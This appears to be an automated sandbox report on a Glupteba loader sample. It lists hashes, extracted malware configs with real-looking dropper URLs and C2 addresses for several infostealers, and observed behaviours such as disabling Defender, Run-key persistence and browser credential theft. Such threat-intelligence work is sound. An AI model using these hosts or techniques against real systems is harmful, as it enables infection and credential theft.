glupteba | 9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423

Analysis

max time kernel
64s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
12-03-2022 04:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
Size

7.7MB
MD5

c126f53f5b81c855bd0b33196d4a4519
SHA1

420c006f4dbbd98214bd7ff051cab90bc102f926
SHA256

9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423
SHA512

9f39602cc2de86db0a6f9e8aba5dc275ef9f9145509314d9428e705918ae5cb9d045a20b5508053d089817a0ca267216db4b1e51c4364551d27e164c5950254e

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/Fax.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/Offer/Offer.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.71/cs/SkyDrive.oo

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

raccoon

Botnet

5e952d9d2bbe82643afb1857a7befd7377f3a063

Attributes

url4cnc
http://185.3.95.153/sbjoahera
http://185.163.204.22/sbjoahera
https://t.me/sbjoahera

rc4.plain

Extracted

Family

vidar

Version

50.7

Botnet

937

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes

profile_id
937

Extracted

Family

redline

Botnet

Lyla2

bonezarisor.xyz:80

Attributes

auth_value
de2a98abc502b86b809fbc366af9256a

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2456-168-0x0000000002EB0000-0x00000000037D7000-memory.dmp	family_glupteba
behavioral2/memory/2456-170-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba
behavioral2/memory/3848-174-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba
behavioral2/memory/1996-177-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 12 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2328-201-0x0000000000C80000-0x0000000000EC5000-memory.dmp	family_redline
behavioral2/memory/2328-215-0x0000000000C80000-0x0000000000EC5000-memory.dmp	family_redline
behavioral2/memory/2328-233-0x0000000000C80000-0x0000000000EC5000-memory.dmp	family_redline
behavioral2/memory/2028-237-0x0000000000480000-0x00000000007C5000-memory.dmp	family_redline
behavioral2/memory/2028-244-0x0000000000480000-0x00000000007C5000-memory.dmp	family_redline
behavioral2/memory/2028-250-0x0000000000480000-0x00000000007C5000-memory.dmp	family_redline
behavioral2/memory/2028-239-0x0000000000480000-0x00000000007C5000-memory.dmp	family_redline
behavioral2/memory/2328-236-0x0000000000C80000-0x0000000000EC5000-memory.dmp	family_redline
behavioral2/memory/2328-212-0x0000000000C80000-0x0000000000EC5000-memory.dmp	family_redline
behavioral2/memory/2328-199-0x0000000000C80000-0x0000000000EC5000-memory.dmp	family_redline
behavioral2/memory/5952-347-0x0000000000B20000-0x0000000000E52000-memory.dmp	family_redline
behavioral2/memory/5952-349-0x0000000000B20000-0x0000000000E52000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 2260 created 2456 2260 svchost.exe Conhost.exe
PID 2260 created 1996 2260 svchost.exe csrss.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata

description	pid	process	target process
PID 2260 created 2456	2260	svchost.exe	Conhost.exe
PID 2260 created 1996	2260	svchost.exe	csrss.exe

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/4204-271-0x0000000000400000-0x0000000000534000-memory.dmp	family_vidar
behavioral2/memory/4204-257-0x00000000021A0000-0x000000000224C000-memory.dmp	family_vidar

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 23 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFile.exejfiag3g_gg.exejfiag3g_gg.exeGraphics.execsrss.exeinjector.exe40WBlCeaNLSz3n2x_zx3_34z.exeiCGcYDTklQlL5864sruYWI4l.exeByduaBYCZWTyfB3nbvNvi9Cb.exeLLu74zxLUwRvf6Wu4dBPkIHT.exen9kuCWbwTpyuOMtLZUnGC8gy.exeHHjGlr1FOLKx5f6Nq5ZOBvru.exeqevwR0y5gSj_fLxDoqCOS04H.exeAIOs52ptMK7ksGBBNb6S4qEp.exeoumII6Q2avjuk0Ds5DVeqcBh.exe

pid	process
1224	SoCleanInst.exe
2028	md9_1sjm.exe
2232	Folder.exe
2456	Graphics.exe
2664	Updbdate.exe
2692	Install.exe
4368	Files.exe
4824	pub2.exe
4248	File.exe
1432	jfiag3g_gg.exe
5064	jfiag3g_gg.exe
3848	Graphics.exe
1996	csrss.exe
4840	injector.exe
4404	40WBlCeaNLSz3n2x_zx3_34z.exe
4900	iCGcYDTklQlL5864sruYWI4l.exe
2328	ByduaBYCZWTyfB3nbvNvi9Cb.exe
3808	LLu74zxLUwRvf6Wu4dBPkIHT.exe
3680	n9kuCWbwTpyuOMtLZUnGC8gy.exe
3904	HHjGlr1FOLKx5f6Nq5ZOBvru.exe
380	qevwR0y5gSj_fLxDoqCOS04H.exe
4204	AIOs52ptMK7ksGBBNb6S4qEp.exe
1252	oumII6Q2avjuk0Ds5DVeqcBh.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\IQ05wMi5MT8AqFpPT9SHU6dD.exe	upx
C:\Users\Admin\Pictures\Adobe Films\IQ05wMi5MT8AqFpPT9SHU6dD.exe	upx
C:\Users\Admin\Pictures\Adobe Films\HHjGlr1FOLKx5f6Nq5ZOBvru.exe	upx
C:\Users\Admin\Pictures\Adobe Films\HHjGlr1FOLKx5f6Nq5ZOBvru.exe	upx

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exeFile.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	File.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Graphics.exeFiles.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LivelyThunder = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

md9_1sjm.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md9_1sjm.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

124 ipinfo.io
125 ipinfo.io
129 api.db-ip.com
236 ipinfo.io
239 api.db-ip.com
277 ipinfo.io
21 ip-api.com
279 api.db-ip.com
128 api.db-ip.com
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

ByduaBYCZWTyfB3nbvNvi9Cb.exe

pid process

2328 ByduaBYCZWTyfB3nbvNvi9Cb.exe
Drops file in Windows directory 2 IoCs

Processes:

Graphics.exe

description ioc process

File opened for modification C:\Windows\rss Graphics.exe
File created C:\Windows\rss\csrss.exe Graphics.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe

flow	ioc
124	ipinfo.io
125	ipinfo.io
129	api.db-ip.com
236	ipinfo.io
239	api.db-ip.com
277	ipinfo.io
21	ip-api.com
279	api.db-ip.com
128	api.db-ip.com

pid	process
2328	ByduaBYCZWTyfB3nbvNvi9Cb.exe

description	ioc	process
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
780	2456	WerFault.exe	Graphics.exe
4232	2456	WerFault.exe	Graphics.exe
3768	2456	WerFault.exe	Graphics.exe
4528	2456	WerFault.exe	Graphics.exe
4772	2456	WerFault.exe	Graphics.exe
4956	2456	WerFault.exe	Graphics.exe
3516	2456	WerFault.exe	Graphics.exe
3668	2456	WerFault.exe	Graphics.exe
3396	2456	WerFault.exe	Graphics.exe
2564	2456	WerFault.exe	Graphics.exe
4224	2456	WerFault.exe	Graphics.exe
3572	2456	WerFault.exe	Graphics.exe
696	2456	WerFault.exe	Graphics.exe
944	2456	WerFault.exe	Graphics.exe
3808	2456	WerFault.exe	Graphics.exe
2544	2456	WerFault.exe	Graphics.exe
64	2456	WerFault.exe	Graphics.exe
4416	2456	WerFault.exe	Graphics.exe
4320	2456	WerFault.exe	Graphics.exe
4352	2456	WerFault.exe	Graphics.exe
1328	2456	WerFault.exe	Graphics.exe
5056	3848	WerFault.exe	Graphics.exe
412	3848	WerFault.exe	Graphics.exe
1876	3848	WerFault.exe	Graphics.exe
4668	3848	WerFault.exe	Graphics.exe
3008	3848	WerFault.exe	Graphics.exe
4600	3848	WerFault.exe	Graphics.exe
2592	3848	WerFault.exe	Graphics.exe
4732	3848	WerFault.exe	Graphics.exe
2084	3848	WerFault.exe	Graphics.exe
2796	3848	WerFault.exe	Graphics.exe
2420	3848	WerFault.exe	Graphics.exe
1096	3848	WerFault.exe	Graphics.exe
4340	3848	WerFault.exe	Graphics.exe
4772	3848	WerFault.exe	Graphics.exe
2192	3848	WerFault.exe	Graphics.exe
4880	3848	WerFault.exe	Graphics.exe
1644	1996	WerFault.exe	csrss.exe
2372	1996	WerFault.exe	csrss.exe
4616	1996	WerFault.exe	csrss.exe
4232	1996	WerFault.exe	csrss.exe
3136	1996	WerFault.exe	csrss.exe
2704	1996	WerFault.exe	csrss.exe
3724	1996	WerFault.exe	csrss.exe
4676	1996	WerFault.exe	csrss.exe
4660	1996	WerFault.exe	csrss.exe
64	1996	WerFault.exe	csrss.exe
4252	1996	WerFault.exe	csrss.exe
3424	1996	WerFault.exe	csrss.exe
4648	1996	WerFault.exe	csrss.exe
436	1996	WerFault.exe	csrss.exe
3672	1996	WerFault.exe	csrss.exe
4668	1996	WerFault.exe	csrss.exe
4860	1996	WerFault.exe	csrss.exe
1328	1996	WerFault.exe	csrss.exe
3096	1996	WerFault.exe	csrss.exe
3292	1996	WerFault.exe	csrss.exe
1756	1996	WerFault.exe	csrss.exe
4860	1996	WerFault.exe	csrss.exe
2784	1996	WerFault.exe	csrss.exe
3452	1996	WerFault.exe	csrss.exe
3476	1996	WerFault.exe	csrss.exe
4724	4528	WerFault.exe	Ss96224Wrf5JEtVKqjue6uWk.exe
3088	5068	WerFault.exe	c1cv7B98fhQZvu1QhcPBh2NK.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4216 schtasks.exe
5408 schtasks.exe
5440 schtasks.exe
2248 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

3424 timeout.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

344 taskkill.exe
2288 taskkill.exe

pid	process
4216	schtasks.exe
5408	schtasks.exe
5440	schtasks.exe
2248	schtasks.exe

pid	process
3424	timeout.exe

pid	process
344	taskkill.exe
2288	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	Graphics.exe
